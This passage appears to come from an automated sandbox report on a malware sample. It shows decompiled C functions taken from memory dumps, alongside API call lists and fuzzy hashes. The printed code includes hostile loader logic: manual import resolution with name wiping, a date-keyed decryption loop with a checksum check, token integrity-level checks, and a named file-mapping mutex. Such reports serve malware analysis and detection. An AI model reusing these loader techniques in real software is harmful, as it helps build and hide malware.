                  				_v8 = _t27;
                  				L00DCABFA();
                  				_t17 = CreateFileMappingW(0xffffffff, 0xdcd234, 4, 0, 0x1000,  &_v56); // executed
                  				_t30 = _t17;
                  				if(_t30 == 0) {
                  					_t28 = GetLastError();
                  				} else {
                  					if(GetLastError() == 0xb7) {
                  						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
                  						if(_t21 == 0) {
                  							_t28 = GetLastError();
                  							if(_t28 != 0) {
                  								goto L6;
                  							}
                  						} else {
                  							 *_a4 = _t30;
                  							 *_a8 = _t21;
                  							_t28 = 0;
                  						}
                  					} else {
                  						_t28 = 2;
                  						L6:
                  						CloseHandle(_t30);
                  					}
                  				}
                  				return _t28;
                  			}














                  APIs
                  • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,00DC7881,?,00000001,?), ref: 00DC12F4
                  • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 00DC130A
                  • _snwprintf.NTDLL ref: 00DC132F
                  • CreateFileMappingW.KERNELBASE(000000FF,00DCD234,00000004,00000000,00001000,?), ref: 00DC134B
                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00DC7881,?), ref: 00DC135D
                  • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 00DC1374
                  • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00DC7881), ref: 00DC1395
                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00DC7881,?), ref: 00DC139D
                  Memory Dump Source
                  • Source File: 00000014.00000002.469493764.0000000000DC1000.00000020.00000001.sdmp, Offset: 00DC0000, based on PE: true
                  • Associated: 00000014.00000002.469471880.0000000000DC0000.00000004.00000001.sdmp
                  • Associated: 00000014.00000002.469527134.0000000000DCC000.00000002.00000001.sdmp
                  • Associated: 00000014.00000002.469542653.0000000000DCD000.00000004.00000001.sdmp
                  • Associated: 00000014.00000002.469561184.0000000000DCF000.00000002.00000001.sdmp
                  Similarity
                  • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                  • String ID:
                  • API String ID: 1814172918-0
                  • Opcode ID: 21f5bf6881bb4600981fd9801955aaa7edb285192ccc1e35064ab745b38031f0
                  • Instruction ID: 4af33cd7fc364e13c6b8a03bf906b10e1d6b4d25963b2d61af177c5a008805ac
                  • Opcode Fuzzy Hash: 21f5bf6881bb4600981fd9801955aaa7edb285192ccc1e35064ab745b38031f0
                  • Instruction Fuzzy Hash: 37210276A4031AFBD721AB98CC05F9D77B9AF85704F380129F609EB2D1D670D9059B70
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E702512D5(intOrPtr* _a4, intOrPtr _a8) {
                  				signed int _v8;
                  				signed short _v12;
                  				struct HINSTANCE__* _v16;
                  				intOrPtr _v20;
                  				_Unknown_base(*)()* _v24;
                  				intOrPtr _t34;
                  				intOrPtr _t36;
                  				struct HINSTANCE__* _t37;
                  				intOrPtr _t40;
                  				CHAR* _t44;
                  				_Unknown_base(*)()* _t45;
                  				intOrPtr* _t52;
                  				intOrPtr _t53;
                  				signed short _t54;
                  				intOrPtr* _t57;
                  				signed short _t59;
                  				CHAR* _t60;
                  				CHAR* _t62;
                  				signed short* _t64;
                  				void* _t65;
                  				signed short _t72;
                  
                  				_t34 =  *((intOrPtr*)(_a8 + 0x80));
                  				_v8 = _v8 & 0x00000000;
                  				_t52 = _a4;
                  				if(_t34 == 0) {
                  					L28:
                  					return _v8;
                  				}
                  				_t57 = _t34 + _t52;
                  				_t36 =  *((intOrPtr*)(_t57 + 0xc));
                  				_a4 = _t57;
                  				if(_t36 == 0) {
                  					L27:
                  					goto L28;
                  				}
                  				while(1) {
                  					_t62 = _t36 + _t52;
                  					_t37 = LoadLibraryA(_t62); // executed
                  					_v16 = _t37;
                  					if(_t37 == 0) {
                  						break;
                  					}
                  					_v12 = _v12 & 0x00000000;
                  					memset(_t62, 0, lstrlenA(_t62));
                  					_t53 =  *_t57;
                  					_t40 =  *((intOrPtr*)(_t57 + 0x10));
                  					_t65 = _t65 + 0xc;
                  					if(_t53 != 0) {
                  						L6:
                  						_t64 = _t53 + _t52;
                  						_t54 =  *_t64;
                  						if(_t54 == 0) {
                  							L23:
                  							_t36 =  *((intOrPtr*)(_t57 + 0x20));
                  							_t57 = _t57 + 0x14;
                  							_a4 = _t57;
                  							if(_t36 != 0) {
                  								continue;
                  							}
                  							L26:
                  							goto L27;
                  						}
                  						_v20 = _t40 - _t64 + _t52;
                  						_t72 = _t54;
                  						L8:
                  						L8:
                  						if(_t72 < 0) {
                  							if(_t54 < _t52 || _t54 >=  *((intOrPtr*)(_a8 + 0x50)) + _t52) {
                  								_t59 = 0;
                  								_v12 =  *_t64 & 0x0000ffff;
                  							} else {
                  								_t59 = _t54;
                  							}
                  						} else {
                  							_t59 = _t54 + _t52;
                  						}
                  						_t20 = _t59 + 2; // 0x2
                  						_t44 = _t20;
                  						if(_t59 == 0) {
                  							_t44 = _v12 & 0x0000ffff;
                  						}
                  						_t45 = GetProcAddress(_v16, _t44);
                  						_v24 = _t45;
                  						if(_t45 == 0) {
                  							goto L21;
                  						}
                  						if(_t59 != 0) {
                  							_t60 = _t59 + 2;
                  							memset(_t60, 0, lstrlenA(_t60));
                  							_t65 = _t65 + 0xc;
                  						}
                  						 *(_v20 + _t64) = _v24;
                  						_t64 =  &(_t64[2]);
                  						_t54 =  *_t64;
                  						if(_t54 != 0) {
                  							goto L8;
                  						} else {
                  							L22:
                  							_t57 = _a4;
                  							goto L23;
                  						}
                  						L21:
                  						_v8 = 0x7f;
                  						goto L22;
                  					}
                  					_t53 = _t40;
                  					if(_t40 == 0) {
                  						goto L23;
                  					}
                  					goto L6;
                  				}
                  				_v8 = 0x7e;
                  				goto L26;
                  			}

























                  APIs
                  • LoadLibraryA.KERNELBASE(00000002,00000002,?,00000000,?,?,00000002), ref: 7025130B
                  • lstrlenA.KERNEL32(00000002), ref: 70251321
                  • memset.NTDLL ref: 7025132B
                  • GetProcAddress.KERNEL32(?,00000002), ref: 7025138E
                  • lstrlenA.KERNEL32(-00000002), ref: 702513A3
                  • memset.NTDLL ref: 702513AD
                  Strings
                  Memory Dump Source
                  • Source File: 00000014.00000002.473300210.0000000070251000.00000020.00020000.sdmp, Offset: 70250000, based on PE: true
                  • Associated: 00000014.00000002.473286168.0000000070250000.00000002.00020000.sdmp
                  • Associated: 00000014.00000002.473313989.0000000070253000.00000002.00020000.sdmp
                  • Associated: 00000014.00000002.473328379.0000000070255000.00000004.00020000.sdmp
                  • Associated: 00000014.00000002.473359976.0000000070256000.00000002.00020000.sdmp
                  Similarity
                  • API ID: lstrlenmemset$AddressLibraryLoadProc
                  • String ID: ~
                  • API String ID: 1986585659-1707062198
                  • Opcode ID: 56aab53dc0a8bb29fe5b58dfc8d75b6a164358d4bdf7b534e7f8d2a88b1b161f
                  • Instruction ID: 0041f135e6c80a5016c3e8401463d739dcbcff822bd018f4a717fb6c9baf79f3
                  • Opcode Fuzzy Hash: 56aab53dc0a8bb29fe5b58dfc8d75b6a164358d4bdf7b534e7f8d2a88b1b161f
                  • Instruction Fuzzy Hash: 6D315D73B00216ABDB01CF59C994BAEB7B9AF44244F2040ECE806D7740D774EA29CB54
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E00DC9FC0(long* _a4) {
                  				long _v8;
                  				void* _v12;
                  				void _v16;
                  				long _v20;
                  				int _t33;
                  				void* _t46;
                  
                  				_v16 = 1;
                  				_v20 = 0x2000;
                  				if( *0xdcd214 > 5) {
                  					_v16 = 0;
                  					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
                  						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
                  						_v8 = 0;
                  						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
                  						if(_v8 != 0) {
                  							_t46 = E00DC75C4(_v8);
                  							if(_t46 != 0) {
                  								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
                  								if(_t33 != 0) {
                  									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
                  								}
                  								E00DC4C31(_t46);
                  							}
                  						}
                  						CloseHandle(_v12);
                  					}
                  				}
                  				 *_a4 = _v20;
                  				return _v16;
                  			}










                  APIs
                  • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 00DC9FF2
                  • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,00000000,00000000), ref: 00DCA012
                  • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,00000000), ref: 00DCA022
                  • CloseHandle.KERNEL32(00000000), ref: 00DCA072
                    • Part of subcall function 00DC75C4: RtlAllocateHeap.NTDLL(00000000,00000000,00DC5068), ref: 00DC75D0
                  • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,00000000,00000000,?), ref: 00DCA045
                  • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 00DCA04D
                  • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 00DCA05D
                  Memory Dump Source
                  • Source File: 00000014.00000002.469493764.0000000000DC1000.00000020.00000001.sdmp, Offset: 00DC0000, based on PE: true
                  • Associated: 00000014.00000002.469471880.0000000000DC0000.00000004.00000001.sdmp
                  • Associated: 00000014.00000002.469527134.0000000000DCC000.00000002.00000001.sdmp
                  • Associated: 00000014.00000002.469542653.0000000000DCD000.00000004.00000001.sdmp
                  • Associated: 00000014.00000002.469561184.0000000000DCF000.00000002.00000001.sdmp
                  Similarity
                  • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
                  • String ID:
                  • API String ID: 1295030180-0
                  • Opcode ID: 19490131bc989a97abeab67fad83c172a45040d336f37fd8b8fdf5c6ea47ecc8
                  • Instruction ID: 7718e4b829dd64abd16393670204c8e6260f0b3484b1c174e6ba4f881047eb9d
                  • Opcode Fuzzy Hash: 19490131bc989a97abeab67fad83c172a45040d336f37fd8b8fdf5c6ea47ecc8
                  • Instruction Fuzzy Hash: 0D21197590020EBFEB109F94DC85EAEBBB9EB08344F1400A9E910A7261C7718A45EB70
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 89%
                  			_entry_(void* __ecx, intOrPtr _a4, long _a8, intOrPtr _a12) {
                  				struct _SECURITY_ATTRIBUTES* _v8;
                  				void* __edi;
                  				void* __esi;
                  				void* __ebp;
                  				long _t9;
                  				void* _t10;
                  				void* _t18;
                  				void* _t23;
                  				void* _t36;
                  
                  				_push(__ecx);
                  				_t9 = _a8;
                  				_v8 = 1;
                  				if(_t9 == 0) {
                  					_t10 = InterlockedDecrement(0x70254108);
                  					__eflags = _t10;
                  					if(_t10 == 0) {
                  						__eflags =  *0x7025410c;
                  						if( *0x7025410c != 0) {
                  							_t36 = 0x2710;
                  							while(1) {
                  								SleepEx(0x64, 1);
                  								__eflags =  *0x70254118;
                  								if( *0x70254118 == 0) {
                  									break;
                  								}
                  								_t36 = _t36 - 0x64;
                  								__eflags = _t36;
                  								if(_t36 > 0) {
                  									continue;
                  								}
                  								break;
                  							}
                  							CloseHandle( *0x7025410c);
                  						}
                  						HeapDestroy( *0x70254110);
                  					}
                  				} else {
                  					if(_t9 == 1 && InterlockedIncrement(0x70254108) == 1) {
                  						_t18 = HeapCreate(0, 0x400000, 0); // executed
                  						_t41 = _t18;
                  						 *0x70254110 = _t18;
                  						if(_t18 == 0) {
                  							L6:
                  							_v8 = 0;
                  						} else {
                  							 *0x70254130 = _a4;
                  							asm("lock xadd [eax], ebx");
                  							_t23 = CreateThread(0, 0, E70251CB2, E70251D4C(_a12, 0, 0x70254118, _t41), 0,  &_a8); // executed
                  							 *0x7025410c = _t23;
                  							if(_t23 == 0) {
                  								asm("lock xadd [esi], eax");
                  								goto L6;
                  							}
                  						}
                  					}
                  				}
                  				return _v8;
                  			}













                  APIs
                  • InterlockedIncrement.KERNEL32(70254108), ref: 70251BC0
                  • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 70251BD5
                  • CreateThread.KERNELBASE ref: 70251C0C
                  • InterlockedDecrement.KERNEL32(70254108), ref: 70251C2C
                  • SleepEx.KERNEL32(00000064,00000001), ref: 70251C46
                  • CloseHandle.KERNEL32 ref: 70251C62
                  • HeapDestroy.KERNEL32 ref: 70251C6E
                  Memory Dump Source
                  • Source File: 00000014.00000002.473300210.0000000070251000.00000020.00020000.sdmp, Offset: 70250000, based on PE: true
                  • Associated: 00000014.00000002.473286168.0000000070250000.00000002.00020000.sdmp
                  • Associated: 00000014.00000002.473313989.0000000070253000.00000002.00020000.sdmp
                  • Associated: 00000014.00000002.473328379.0000000070255000.00000004.00020000.sdmp
                  • Associated: 00000014.00000002.473359976.0000000070256000.00000002.00020000.sdmp
                  Similarity
                  • API ID: CreateHeapInterlocked$CloseDecrementDestroyHandleIncrementSleepThread
                  • String ID:
                  • API String ID: 3416589138-0
                  • Opcode ID: 0f6c6bc5c1be53842627aa0e2e3ac752e1242e3214bf96ea187d80d0dd76ae54
                  • Instruction ID: de361784e467ed7ef39bddc6b5f1ae1421ccdf8bf223feada3704a5bf64efcf3
                  • Opcode Fuzzy Hash: 0f6c6bc5c1be53842627aa0e2e3ac752e1242e3214bf96ea187d80d0dd76ae54
                  • Instruction Fuzzy Hash: 11210733704205AFC7009F6ACC8CB6DBBB8FB5165A73081EAF40AD2250D7B19D549B5D
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 73%
                  			E00DC8714(signed int __edx, intOrPtr _a4) {
                  				struct _FILETIME _v12;
                  				char _v32;
                  				long _v40;
                  				void* _t14;
                  				void* _t16;
                  				int _t18;
                  				signed int _t20;
                  				void* _t22;
                  				signed int _t23;
                  				intOrPtr _t25;
                  				unsigned int _t29;
                  				signed int _t33;
                  				signed int _t40;
                  
                  				_t33 = __edx;
                  				_t14 = HeapCreate(0, 0x400000, 0); // executed
                  				 *0xdcd1f0 = _t14;
                  				if(_t14 != 0) {
                  					 *0xdcd160 = GetTickCount();
                  					_t16 = E00DC7A5D(_a4);
                  					if(_t16 != 0) {
                  						L10:
                  						return _t16;
                  					} else {
                  						goto L3;
                  					}
                  					do {
                  						L3:
                  						GetSystemTimeAsFileTime( &_v12);
                  						_t18 = SwitchToThread();
                  						_t29 = _v12.dwHighDateTime;
                  						_t20 = (_t29 << 0x00000020 | _v12.dwLowDateTime) >> 7;
                  						_push(0);
                  						_push(9);
                  						_push(_t29 >> 7);
                  						_push(_t20);
                  						L00DCB03E();
                  						_t40 = _t18 + _t20;
                  						_t22 = E00DC501B(_a4, _t40);
                  						_t23 = 2;
                  						Sleep(_t23 << _t40); // executed
                  					} while (_t22 == 1);
                  					_t25 =  *0xdcd20c; // 0x32c
                  					_v32 = 0;
                  					if(_t25 != 0) {
                  						__imp__(_t25,  &_v32);
                  						if(_t25 == 0) {
                  							_v40 = 0;
                  						}
                  						if(_v40 != 0) {
                  							 *0xdcd218 = 1; // executed
                  						}
                  					}
                  					_t16 = E00DC77EB(_t33); // executed
                  					goto L10;
                  				}
                  				_t16 = 8;
                  				goto L10;
                  			}

















                  APIs
                  • HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001), ref: 00DC8729
                  • GetTickCount.KERNEL32 ref: 00DC8740
                  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,00000001), ref: 00DC8760
                  • SwitchToThread.KERNEL32(?,00000001), ref: 00DC8766
                  • _aullrem.NTDLL(?,?,00000009,00000000), ref: 00DC8782
                  • Sleep.KERNELBASE(00000002,00000000,?,00000001), ref: 00DC879C
                  • IsWow64Process.KERNEL32(0000032C,?,?,00000001), ref: 00DC87BA
                  Memory Dump Source
                  • Source File: 00000014.00000002.469493764.0000000000DC1000.00000020.00000001.sdmp, Offset: 00DC0000, based on PE: true
                  • Associated: 00000014.00000002.469471880.0000000000DC0000.00000004.00000001.sdmp
                  • Associated: 00000014.00000002.469527134.0000000000DCC000.00000002.00000001.sdmp
                  • Associated: 00000014.00000002.469542653.0000000000DCD000.00000004.00000001.sdmp
                  • Associated: 00000014.00000002.469561184.0000000000DCF000.00000002.00000001.sdmp
                  Similarity
                  • API ID: Time$CountCreateFileHeapProcessSleepSwitchSystemThreadTickWow64_aullrem
                  • String ID:
                  • API String ID: 3690864001-0
                  • Opcode ID: 60d08cb12b085b92d16b587e94cd329dd802ed97d4acfadcbc4f2f7c6f8033de
                  • Instruction ID: 742761246130f4f6d3474c43a7d175ce61a88bae87a3f71e7637aafd01c37eb0
                  • Opcode Fuzzy Hash: 60d08cb12b085b92d16b587e94cd329dd802ed97d4acfadcbc4f2f7c6f8033de
                  • Instruction Fuzzy Hash: 2C2193B2500307AFD7109F64DC89F6A77D8EB44355F14492DF659C3290EB30D8049B71
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • GetSystemDirectoryA.KERNEL32(702C1460,0000079D), ref: 70290535
                  • Sleep.KERNELBASE(0000008F), ref: 70290A35
                  Strings
                  Memory Dump Source
                  • Source File: 00000014.00000002.473412155.0000000070260000.00000020.00020000.sdmp, Offset: 70260000, based on PE: false
                  Similarity
                  • API ID: DirectorySleepSystem
                  • String ID: "$;0Vu$S
                  • API String ID: 2556431487-2513040136
                  • Opcode ID: f123149b4f1f7c8843663e0c5d84d76c1fd1050bd107e0ed8cd948a54335bcf6
                  • Instruction ID: 3ba81995f0a4cc5887f8f38c2c0c8d8e663dc06cd335db83b2964d98fa071e2e
                  • Opcode Fuzzy Hash: f123149b4f1f7c8843663e0c5d84d76c1fd1050bd107e0ed8cd948a54335bcf6
                  • Instruction Fuzzy Hash: 29929C73A093968FD304CF3DC9D825EBBE1ABC9300F148A2DE499D3356D2349915EB96
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E70251A07(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
                  				intOrPtr _v8;
                  				_Unknown_base(*)()* _t28;
                  				_Unknown_base(*)()* _t32;
                  				_Unknown_base(*)()* _t35;
                  				_Unknown_base(*)()* _t38;
                  				_Unknown_base(*)()* _t41;
                  				intOrPtr _t44;
                  				struct HINSTANCE__* _t48;
                  				intOrPtr _t54;
                  
                  				_t54 = E702519C2(0x20);
                  				if(_t54 == 0) {
                  					_v8 = 8;
                  				} else {
                  					_t48 = GetModuleHandleA( *0x70254150 + 0x70255014);
                  					_v8 = 0x7f;
                  					_t28 = GetProcAddress(_t48,  *0x70254150 + 0x702550e1);
                  					 *(_t54 + 0xc) = _t28;
                  					if(_t28 == 0) {
                  						L8:
                  						E702515C4(_t54);
                  					} else {
                  						_t32 = GetProcAddress(_t48,  *0x70254150 + 0x702550f1);
                  						 *(_t54 + 0x10) = _t32;
                  						if(_t32 == 0) {
                  							goto L8;
                  						} else {
                  							_t35 = GetProcAddress(_t48,  *0x70254150 + 0x70255104);
                  							 *(_t54 + 0x14) = _t35;
                  							if(_t35 == 0) {
                  								goto L8;
                  							} else {
                  								_t38 = GetProcAddress(_t48,  *0x70254150 + 0x70255119);
                  								 *(_t54 + 0x18) = _t38;
                  								if(_t38 == 0) {
                  									goto L8;
                  								} else {
                  									_t41 = GetProcAddress(_t48,  *0x70254150 + 0x7025512f);
                  									 *(_t54 + 0x1c) = _t41;
                  									if(_t41 == 0) {
                  										goto L8;
                  									} else {
                  										 *((intOrPtr*)(_t54 + 4)) = _a4;
                  										 *((intOrPtr*)(_t54 + 8)) = 0x40;
                  										_t44 = E7025161B(_t54, _a8); // executed
                  										_v8 = _t44;
                  										if(_t44 != 0) {
                  											goto L8;
                  										} else {
                  											 *_a12 = _t54;
                  										}
                  									}
                  								}
                  							}
                  						}
                  					}
                  				}
                  				return _v8;
                  			}

                  APIs
                    • Part of subcall function 702519C2: HeapAlloc.KERNEL32(00000000,?,7025182D,?,00000000,00000000,?,702511D6), ref: 702519CE
                  • GetModuleHandleA.KERNEL32(?,00000020,00000002,0000000A,?,?,?,?,702516ED,?,?,?,00000002,?,?,?), ref: 70251A2C
                  • GetProcAddress.KERNEL32(00000000,?), ref: 70251A4E
                  • GetProcAddress.KERNEL32(00000000,?), ref: 70251A64
                  • GetProcAddress.KERNEL32(00000000,?), ref: 70251A7A
                  • GetProcAddress.KERNEL32(00000000,?), ref: 70251A90
                  • GetProcAddress.KERNEL32(00000000,?), ref: 70251AA6
                    • Part of subcall function 7025161B: NtCreateSection.NTDLL(00000002,000F001F,?,?,?,08000000,00000000,74B04EE0,00000000,00000000,00000002), ref: 70251678
                    • Part of subcall function 7025161B: memset.NTDLL ref: 7025169A
                  Memory Dump Source
                  • Source File: 00000014.00000002.473300210.0000000070251000.00000020.00020000.sdmp, Offset: 70250000, based on PE: true
                  • Associated: 00000014.00000002.473286168.0000000070250000.00000002.00020000.sdmp
                  • Associated: 00000014.00000002.473313989.0000000070253000.00000002.00020000.sdmp
                  • Associated: 00000014.00000002.473328379.0000000070255000.00000004.00020000.sdmp
                  • Associated: 00000014.00000002.473359976.0000000070256000.00000002.00020000.sdmp
                  Similarity
                  • API ID: AddressProc$AllocCreateHandleHeapModuleSectionmemset
                  • String ID:
                  • API String ID: 1632424568-0
                  • Opcode ID: d303cacb7cbab5b772f34b0838e870cec0895c523a0ab80999f9d2b7e1bc5994
                  • Instruction ID: 71fb300d3a48136d24ed99ab0f099e34fb4f45e944c6390ce4780c7d67393b07
                  • Opcode Fuzzy Hash: d303cacb7cbab5b772f34b0838e870cec0895c523a0ab80999f9d2b7e1bc5994
                  • Instruction Fuzzy Hash: F7210AB360160A9FD711DF6AC944F9ABBFCEF082447104599E51ACB350E670ED09DF68
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000014.00000002.473412155.0000000070260000.00000020.00020000.sdmp, Offset: 70260000, based on PE: false
                  Similarity
                  • API ID: dllmain_raw$dllmain_crt_dispatch
                  • String ID:
                  • API String ID: 3136044242-0
                  • Opcode ID: 5cdbb2e470c18464d0e2fe7583ac86aaf735f166732659efad3fb887306dece8
                  • Instruction ID: f1611e7d66350a0f162d7d6a2cd78dacdef365a9e20ac366e16c115b449eb013
                  • Opcode Fuzzy Hash: 5cdbb2e470c18464d0e2fe7583ac86aaf735f166732659efad3fb887306dece8
                  • Instruction Fuzzy Hash: 2E21A173D2821ABEDB228F14CC41A6F3A79EF84790F104119FC1AB7650D7309D318B98
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 87%
                  			E70251000(void* __edi, intOrPtr _a4) {
                  				intOrPtr _v8;
                  				unsigned int _v12;
                  				intOrPtr _v16;
                  				char _v20;
                  				void* _v24;
                  				intOrPtr _v28;
                  				intOrPtr _v32;
                  				void* _v36;
                  				signed int _v44;
                  				signed int _v48;
                  				intOrPtr _t39;
                  				void* _t46;
                  				intOrPtr _t47;
                  				intOrPtr _t50;
                  				signed int _t59;
                  				signed int _t61;
                  				intOrPtr _t66;
                  				intOrPtr _t77;
                  				void* _t78;
                  				signed int _t80;
                  
                  				_t77 =  *0x70254130;
                  				_t39 = E70251416(_t77,  &_v20,  &_v12);
                  				_v16 = _t39;
                  				if(_t39 == 0) {
                  					asm("sbb ebx, ebx");
                  					_t59 =  ~( ~(_v12 & 0x00000fff)) + (_v12 >> 0xc);
                  					_t78 = _t77 + _v20;
                  					_v36 = _t78;
                  					_t46 = VirtualAlloc(0, _t59 << 0xc, 0x3000, 4); // executed
                  					_v24 = _t46;
                  					if(_t46 == 0) {
                  						_v16 = 8;
                  					} else {
                  						_t61 = 0;
                  						if(_t59 <= 0) {
                  							_t47 =  *0x7025414c;
                  						} else {
                  							_t66 = _a4;
                  							_t50 = _t46 - _t78;
                  							_t11 = _t66 + 0x70255137; // 0x70255137
                  							_v28 = _t50;
                  							_v32 = _t50 + _t11;
                  							_v8 = _t78;
                  							while(1) {
                  								asm("movsd");
                  								asm("movsd");
                  								asm("movsd");
                  								_t19 = _t61 + 1; // 0x2
                  								_t80 = _t19;
                  								E70251AED(_v8 + _t50, _v8, (_v48 ^ _v44) + _v20 + _a4 >> _t80);
                  								_t64 = _v32;
                  								_v8 = _v8 + 0x1000;
                  								_t47 =  *((intOrPtr*)(_v32 + 0xc)) -  *((intOrPtr*)(_t64 + 8)) +  *((intOrPtr*)(_t64 + 4));
                  								_t61 = _t80;
                  								 *0x7025414c = _t47;
                  								if(_t61 >= _t59) {
                  									break;
                  								}
                  								_t50 = _v28;
                  							}
                  						}
                  						if(_t47 != 0x63699bc3) {
                  							_v16 = 0xc;
                  						} else {
                  							memcpy(_v36, _v24, _v12);
                  						}
                  						VirtualFree(_v24, 0, 0x8000); // executed
                  					}
                  				}
                  				return _v16;
                  			}

                  APIs
                  • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,00000000,?,00000000,?,?,?,?,?,?,702511B2,00000000), ref: 70251056
                  • memcpy.NTDLL(?,702511B2,?,?,00000000,?,00000000,?,?,?,?,?,?,702511B2,00000000), ref: 702510E8
                  • VirtualFree.KERNELBASE(702511B2,00000000,00008000,?,00000000,?,00000000,?,?,?,?,?,?,702511B2,00000000), ref: 70251103
                  Strings
                  Memory Dump Source
                  • Source File: 00000014.00000002.473300210.0000000070251000.00000020.00020000.sdmp, Offset: 70250000, based on PE: true
                  • Associated: 00000014.00000002.473286168.0000000070250000.00000002.00020000.sdmp
                  • Associated: 00000014.00000002.473313989.0000000070253000.00000002.00020000.sdmp
                  • Associated: 00000014.00000002.473328379.0000000070255000.00000004.00020000.sdmp
                  • Associated: 00000014.00000002.473359976.0000000070256000.00000002.00020000.sdmp
                  Similarity
                  • API ID: Virtual$AllocFreememcpy
                  • String ID: Feb 12 2021
                  • API String ID: 4010158826-2916597941
                  • Opcode ID: 0af6b82d3ebda98a538b38719348708073690ef3c6a380cef4a9f61fb78d1c5c
                  • Instruction ID: 6a95f46cdf2bbe1f9fa933b1af50bffb58e7af01f00b8eb9677044305b026c6a
                  • Opcode Fuzzy Hash: 0af6b82d3ebda98a538b38719348708073690ef3c6a380cef4a9f61fb78d1c5c
                  • Instruction Fuzzy Hash: AD317272E002199FCB01CF99C881B9EF7B9AF48304F2081A9E905B7384D775AA59CF94
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 81%
                  			E70251E8A() {
                  				char _v28;
                  				void _v44;
                  				char _v48;
                  				void* _v52;
                  				long _t24;
                  				int _t25;
                  				void* _t29;
                  				intOrPtr* _t31;
                  				signed int _t34;
                  				void* _t36;
                  				intOrPtr _t37;
                  				int _t41;
                  
                  				 *0x70254148 =  *0x70254148 & 0x00000000;
                  				_push(0);
                  				_push(0x70254144);
                  				_push(1);
                  				_push( *0x70254150 + 0x70255089);
                  				 *0x70254140 = 0xc; // executed
                  				L70251CAC(); // executed
                  				_t34 = 6;
                  				memset( &_v44, 0, _t34 << 2);
                  				if(E702517C2( &_v44,  &_v28,  *0x7025414c ^ 0xfd7cd1cf) == 0) {
                  					_t24 = 0xb;
                  					L7:
                  					ExitThread(_t24);
                  				}
                  				_t25 = lstrlenW( *0x70254138);
                  				_t7 = _t25 + 2; // 0x2
                  				_t41 = _t25 + _t7;
                  				_t10 = _t41 + 8; // 0xa
                  				_t29 = E70251470(_t37, _t10,  &_v48,  &_v52); // executed
                  				if(_t29 == 0) {
                  					_t36 =  *0x70254138;
                  					_t31 = _v52;
                  					 *_t31 = 0;
                  					if(_t36 == 0) {
                  						 *(_t31 + 4) =  *(_t31 + 4) & 0x00000000;
                  					} else {
                  						memcpy(_t31 + 4, _t36, _t41);
                  					}
                  				}
                  				_t24 = E702516C3(_v44, _t37); // executed
                  				goto L7;
                  			}

                  APIs
                  • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(?,00000001,70254144,00000000), ref: 70251EBA
                  • lstrlenW.KERNEL32(?,?,?), ref: 70251EEE
                    • Part of subcall function 70251470: GetSystemTimeAsFileTime.KERNEL32(?,00000002,?,?,?,?,?,?,?,?,?,?,?,70251F0B,0000000A,?), ref: 7025147D
                    • Part of subcall function 70251470: _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 70251493
                    • Part of subcall function 70251470: _snwprintf.NTDLL ref: 702514B8
                    • Part of subcall function 70251470: CreateFileMappingW.KERNELBASE(000000FF,70254140,00000004,00000000,?,?), ref: 702514DD
                    • Part of subcall function 70251470: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,70251F0B,0000000A), ref: 702514F4
                    • Part of subcall function 70251470: CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,70251F0B), ref: 70251529
                  • memcpy.NTDLL(?,?,00000002,0000000A,?,?), ref: 70251F29
                  • ExitThread.KERNEL32 ref: 70251F47
                  Memory Dump Source
                  • Source File: 00000014.00000002.473300210.0000000070251000.00000020.00020000.sdmp, Offset: 70250000, based on PE: true
                  • Associated: 00000014.00000002.473286168.0000000070250000.00000002.00020000.sdmp
                  • Associated: 00000014.00000002.473313989.0000000070253000.00000002.00020000.sdmp
                  • Associated: 00000014.00000002.473328379.0000000070255000.00000004.00020000.sdmp
                  • Associated: 00000014.00000002.473359976.0000000070256000.00000002.00020000.sdmp
                  Similarity
                  • API ID: DescriptorFileSecurityTime$CloseConvertCreateErrorExitHandleLastMappingStringSystemThread_aulldiv_snwprintflstrlenmemcpy
                  • String ID:
                  • API String ID: 2378523637-0
